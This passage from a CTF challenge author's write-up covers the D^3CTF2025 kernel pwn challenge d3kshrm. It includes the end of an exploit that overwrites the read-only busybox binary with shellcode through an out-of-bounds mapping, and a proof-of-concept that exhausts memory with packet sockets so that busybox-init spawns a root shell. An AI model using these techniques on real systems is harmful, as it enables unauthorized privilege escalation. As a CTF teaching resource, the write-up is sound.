    log_info("[*] Checking for oob mapping...");

    victim_buf = NULL;
    for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
        /* Examine ELF header to see whether we hit the busybox */
        if (*(size_t*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR] == 0x3010102464c457f){
            victim_buf = (void*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR];
            break;
        }
    }

    if (!victim_buf) {
        err_exit("FAILED to oob mmap pages in pipe!");
    }

    log_info("[*] Abusing OOB mmap to overwrite read-only file...");
    memcpy(victim_buf, shellcode, sizeof(shellcode));

    log_success("[+] Just enjoy :)");
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kshrm --------") "\n"
    INFO_MSG("--------    Official Exploitation   --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
    banner();
    exploit();
    return 0;
}

Unintended Solution

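I'm very sorry that I did not configure the file system properly, which led to an unintended solution. Before going into the details, I want to thank Qanux from W&M, who first discovered this issue. To be honest, this vulnerability exists because I configured the file system too conventionally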

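A minimal proof-of-concept function that stably triggers the unintended solution without using the challenge module is shown below (for prepare_pgv_system() , alloc_page() and the other helpers, see exp.c above):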

void unintended_exploit(void)
{
    int err;    /* avoid shadowing the errno macro from <errno.h> */
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        if ((err = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((err = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }

        printf("[*] No.%d times\n", i);
        fflush(stdout);
    }

    puts("Done!?");
}

When we run this proof of concept, we notice that our process suddenly stops, and then, for no apparent reason, we get a root shell.

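Why? To figure out what happens during this process, let's take a quick look at the PoC: it simply allocates memory through the setsockopt() system call on packet sockets. We all know that when a process allocates and occupies a large amount of memory, the system runs out of free memory, so the OOM Killer is woken up to kill processes and reclaim memory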

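Which process gets killed? We know that only a few userland processes exist in this environment, so the victim can only come from rcS , sh , and exploit , but which one is the unlucky one? Well, the OOM Killer picks its victim based on several factors including resource usage, and we can check /proc/[pid]/oom_score to judge: the higher the score, the more likely the process is to be killed. I ran a quick test that reads these values with a simple C function.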
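A function of this kind could look like the sketch below. It is not the exact function used for the original test, and the name `read_oom_score()` is made up here; it only relies on the documented `/proc/[pid]/oom_score` file:

```c
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Read the OOM score of a process from /proc/[pid]/oom_score.
 * Returns the score (0 or higher), or -1 if it cannot be read.
 */
static int read_oom_score(pid_t pid)
{
    char path[64];
    int score = -1;
    FILE *fp;

    snprintf(path, sizeof(path), "/proc/%d/oom_score", (int) pid);

    fp = fopen(path, "r");
    if (!fp) {
        return -1;
    }

    if (fscanf(fp, "%d", &score) != 1) {
        score = -1;
    }

    fclose(fp);

    return score;
}
```

Calling it with the PIDs of rcS , sh and the exploit process gives the values to compare.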

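We can see that rcS and sh have the same OOM score, so one of them will be the unlucky one, because our exploit has a lower score. And since rcS runs as root while sh does not, it seems to make sense that sh gets killed? The answer is yes, but not only yes. Let's see what actually happened: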

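They were all killed to reclaim memory! But why? A very important reason is that after a particular process is killed, there may still not be enough free memory to satisfy the allocation request, which can be caused by asynchronous memory reclaim, memory fragmentation and so on. More importantly, we are still allocating memory, so the OOM Killer is woken up multiple times (even within a single allocation), killing sh and rcS in turn according to score and privilege, and finally killing exploit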

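What happens if all of these processes are killed? Since ttyS0 is now idle, init regains control and detects that it is idle. Note that our init system is busybox-init , as we can see that /sbin/init is a symbolic link to busybox , and busybox-init uses /etc/inittab as its configuration. Let's see what I wrote there a long time ago, following the official example from the busybox: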

::sysinit:/etc/init.d/rcS
::askfirst:/bin/ash
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

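Let's look at the ::askfirst: entry whose value is /bin/ash . What does it mean and when is it executed? When no process is running on the TTY, the process specified by this entry is started by /sbin/init with root privileges (just like getty )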

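Now we know why we get a root shell: at initialization, /etc/init.d/rcS runs on ttyS0 and spawns a userland shell for us to interact with. When we perform unrestricted memory allocation in kernel space and occupy almost all free memory, the OOM Killer is woken up and kills these userland processes. Since no process is running on ttyS0 at that point, the /bin/ash specified by the ::askfirst: entry is executed, giving us a root shell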

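This is also how Qanux from W&M happened to solve d3kshrm during the competition: he simply used the functionality of d3kshrm.ko to consume memory, and because of my misconfiguration and flawed design, the amount of memory the challenge was expected to be able to allocate was far larger than the memory of the virtual machine. The OOM Killer was therefore woken up multiple times and killed every userland process except init, after which ttyS0 became idle and busybox-init started a root shell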

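So here comes another question: can we allocate memory directly in user space instead of going through the kernel's memory allocation APIs? The answer is no. A very important reason is that if our process directly allocates a large amount of memory (for example through many malloc() calls that grow the heap segment), our OOM score grows rapidly along with it, and our exploit process will usually be the first one to be killed. Once we are killed, the memory allocation stops, so the kernel no longer needs to wake up the OOM Killer to kill other processes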

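When I received the screenshots from contestants during the competition, I realized very quickly that this had to be caused by the OOM Killer, but what I did not expect was that every process, including rcS , got killed, because this had never happened in any CTF challenge I had written before. My original expectation was that the kernel would panic due to OOM, but the result showed me that the kernel does not always panic (haha, is the kernel afraid of dying too?). According to the contestant, his unintended solution succeeds at least 30% of the time, while the PoC I wrote succeeds more than 99% of the time. I think the main reason is the difference in the API used: packet_set_ring() uses vzalloc_noprof() , which does not ask the kernel for physically contiguous memory (only virtually contiguous memory), meaning the allocation can be split from one high-order request into several low-order ones, whereas the function in d3kshrm.ko calls alloc_pages() directly to allocate high-order memory, so the kernel is more likely to panic because we may be unable to reclaim the contiguous high-order physical memory required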
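To make "high-order" more concrete: the buddy allocator hands out physically contiguous blocks of 2^order pages. The sketch below is a userland re-implementation of the idea behind the kernel's `get_order()`, assuming 4 KiB pages; the name `size_to_order()` is made up for this example. A 0x1000 * 64 byte block, as requested per block in the PoC above, corresponds to order 6 if it has to be physically contiguous, while a virtually contiguous allocation can be backed by 64 independent order-0 pages:

```c
#include <assert.h>
#include <stddef.h>

#define DEMO_PAGE_SHIFT 12
#define DEMO_PAGE_SIZE  (1UL << DEMO_PAGE_SHIFT)

/*
 * Smallest order such that (1 << order) pages cover `size` bytes,
 * assuming 4 KiB pages. Userland model, not the kernel's get_order().
 */
static unsigned int size_to_order(size_t size)
{
    size_t pages = (size + DEMO_PAGE_SIZE - 1) >> DEMO_PAGE_SHIFT;
    unsigned int order = 0;

    while ((1UL << order) < pages) {
        order++;
    }

    return order;
}
```

Under memory pressure and fragmentation, an order-6 request is much harder to satisfy than 64 separate order-0 requests.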

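How did I finally fix this vulnerability? I created a revenge version of the challenge, in which I only changed the ::askfirst: entry in /etc/inittab from /bin/ash to /sbin/poweroff as a temporary fix for this unintended vulnerability, though I think changing it to login might be a better choice? In any case, this taught me a lesson: a perfect environment is not always the most suitable one, and I should check everything in the environment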

What’s more…

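The description of this challenge comes from an advertisement designed by Halo Top that I like very much. Although the video may have been made just for fun, it gave me a special feeling that words cannot express, so I chose it as the basis of the challenge description and modified part of it to give you some meaningless sentences, just as the flag says :)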

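My original inspiration for this challenge came from CVE-2023-2008 , which is likewise an OOB memory mapping vulnerability, so to be honest this challenge is not as hard or as creative as I had hoped. I'm very sorry: I always want to show you something cool, but this time what I showed was not cool enough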

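Another reason I chose to adapt an existing vulnerability is that I really did not have much time to finish these challenges. Since I have already graduated, I had not been paying much attention to how my juniors were preparing for this year's D^3CTF, and only about 10 days before the competition started did I learn that there were almost no pwn challenges yet. So I had to rush this year's Pwn challenges, with hardly any new research results in my head, to make sure the competition could be held as normally as in previous years. I'm very sorry that this year I could not bring you something as cool as d3kcache in 2023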

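And if you look closely enough at this kernel module, you will notice that I wrote another unintended bug in the reference counting of the vm_area: I forgot to write vm_open() to increase the reference count, but still remembered to write vm_close() to decrease it! This confused quite a few contestants and made them waste a lot of time trying to exploit this bug, because it is actually not easy to exploit: a page can hardly be used as a user-mapped page and a SLUB page at the same time (but if you are interested enough, you may want to look at CVE-2024-0582 , whose situation is similar, though I'm not sure whether it works for d3kshrm as well, so good luck). I'm very sorry that I did not check carefully, because this challenge was made in such a rush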
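Why a missing vm_open() matters can be shown with a tiny userland model. Everything here is hypothetical (the struct, the function names, and the assumption that the mmap() handler takes one reference per mapping); it is not the code of d3kshrm.ko . The only kernel behavior it relies on is that a VMA can be duplicated (for example on fork() or when a mapping is split), that `vm_ops->open()` is called for the copy only if the driver provides it, and that `vm_ops->close()` is called for every VMA that goes away:

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model of a reference-counted shared-memory object. */
struct shrm_model {
    int refcount;
};

/* Assumption: the mmap() handler takes one reference for the new VMA. */
static void model_mmap(struct shrm_model *s)
{
    s->refcount++;
}

/* A duplicated VMA only takes a reference if vm_ops->open() exists. */
static void model_vma_dup(struct shrm_model *s, bool has_vm_open)
{
    if (has_vm_open) {
        s->refcount++;
    }
}

/* vm_ops->close() drops one reference for every VMA being removed. */
static void model_vm_close(struct shrm_model *s)
{
    s->refcount--;
}
```

In this model, an object that starts with one reference, is mapped once, duplicated once, and then has both VMAs closed ends up at 0 without vm_open() (one reference too few) and at 1 with it.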

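Over the whole competition, only Tplus from the MNGA team managed to solve this challenge with the intended solution. Let's congratulate the only contestant who solved it the intended way during the competition! Qanux from W&M also solved the challenge with the intended solution after the competition ended (because he did not expect a -revenge version and went out for a big meal after scoring with the unintended solution). In any case, I think we should applaud and congratulate both of them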

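Another interesting point you may overlook is that a new SLUB page is already allocated when the kmem_cache is created, which means our heap feng shui should focus on the next newly allocated SLUB page. I think this is why the intended solutions written by Tplus and Qanux themselves have a lower success rate: they focused on the first SLUB, while my official solution focuses on the second SLUB, so my page-level heap feng shui succeeds more than 80% of the time and needs no brute forcing against the remote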

CTF

#Linux #Linux Kernel #Information Security #Pwn #CTF #D^3CTF #Heap Overflow #Cross-Cache Overflow #Heap Feng Shui #Page-level Heap Fengshui

[CTF.0x0A] D^3CTF2025 d3kheap2 and d3kshrm: Challenge Author's Notes

https://arttnba3.github.io/2025/06/04/CTF-0X0A_D3CTF2025_D3KHEAP2_D3KSHRM/

Author

arttnba3

Published on

June 4, 2025
